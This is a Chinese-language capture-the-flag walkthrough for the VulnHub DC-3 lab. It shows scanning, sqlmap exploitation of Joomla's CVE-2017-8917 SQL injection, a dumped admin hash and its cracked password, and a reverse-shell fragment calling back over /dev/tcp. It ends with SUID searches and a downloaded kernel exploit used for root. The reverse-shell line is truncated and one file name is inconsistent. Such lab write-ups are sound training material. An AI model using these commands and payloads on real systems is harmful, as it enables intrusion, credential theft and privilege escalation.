我爱做靶机之DC-3

下载地址:https://www.vulnhub.com/entry/dc-3,312/

我爱做靶机之DC-3_第1张图片

 主机发现

我爱做靶机之DC-3_第2张图片

扫描端口,发现只开启了80端口,通过-A参数,还可以看到该网站的CMS为Joomla

我爱做靶机之DC-3_第3张图片

我爱做靶机之DC-3_第4张图片

 访问80端口

我爱做靶机之DC-3_第5张图片

目录扫描,发现网站后台

使用nikto工具:nikto -host 192.168.44.144

我爱做靶机之DC-3_第6张图片

使用dirsearch工具

python3 dirsearch.py -u http://192.168.44.144 -e php

我爱做靶机之DC-3_第7张图片

使用joom专用漏洞扫描器joomscan,发现joomla的具体版本号

git clone https://github.com/rezasp/joomscan.git

cd joomscan

perl joomscan.pl 192.168.44.144

我爱做靶机之DC-3_第8张图片

使用searchsploit搜索joomla 3.7.0存在的漏洞

searchsploit joomla 3.7.0

我爱做靶机之DC-3_第9张图片读取

根据给出的路径,读取该文件,发现该版本cms内存在sql注入漏洞CVE-2017-8917

我爱做靶机之DC-3_第10张图片

打开sqlmap开始注入

暴库

python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"

暴表

python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb --tables

暴字段

python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T #__users --columns

暴内容

python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T #__users -C "name,password" --dump

我爱做靶机之DC-3_第11张图片

用户名:admin

密码:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

使用kali的John进行密码破解,得到后台登录密码snoopy

我爱做靶机之DC-3_第12张图片

进入之前找到的网站后台进行登陆http://192.168.44.144/administrator/

我爱做靶机之DC-3_第13张图片

在后台翻啊翻,发现了某处可以修改网站模版的地方,可以直接新建一个PHP文件,直接反弹shell。

我爱做靶机之DC-3_第14张图片

& /dev/tcp/192.168.44.142/8080 0>&1'");?>

我爱做靶机之DC-3_第15张图片

在kali上进行监听,nc -lvvp 8080端口

在浏览器上访问该反弹马,这一块路径卡了一会儿,

结合之前目录扫描出来的templates目录,和模板的名称bees3,再加上linux系统是大小敏感的,

因此花费了一些时间,才找到正确的路径,进行访问

我爱做靶机之DC-3_第16张图片

这是kali已经接收到了shell,

我爱做靶机之DC-3_第17张图片

权限很低,首先尝试suid提权,以下命令可以发现系统上运行的suid可执行文件

  1. find / -perm -u=s -type f 2>/dev/null

  2. find / -user root -perm -4000 -print 2>/dev/null

  3. find / -user root -perm -4000-exec ls -ldb {}

已知的可用来提权的linux可行性的文件:nmap,vim,find,bash,more,less,nano,cp

没有发现可以利用的文件

我爱做靶机之DC-3_第18张图片

尝试内核提权

查看linux版本

利用searchsploit搜索可以利用的漏洞

我爱做靶机之DC-3_第19张图片

根据路径,访问exp详细内容:cat /usr/share/exploitdb/exploits/linux/local/39772.txt 

发现exp下载地址:https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

我爱做靶机之DC-3_第20张图片

我爱做靶机之DC-3_第21张图片

查找具有执行权限的目录

我爱做靶机之DC-3_第22张图片

切换到tmp文件夹下,并且下载searchsploit中的exp

切换:cd tmp

下载:wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

解压:unzip 39773.zip

再解压:tar -xvf exploit.tar

切换:cd ebpf_mapfd_doubleput_exploit/

执行: ./compile.sh

            ./doubleput

然后得到了root权限

我爱做靶机之DC-3_第23张图片

www-data@DC3VM:/var/www/html$ cd tmp
cd tmp
www-data@DC3VM:/var/www/html/tmp$ ls
ls
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

你可能感兴趣的:(靶场)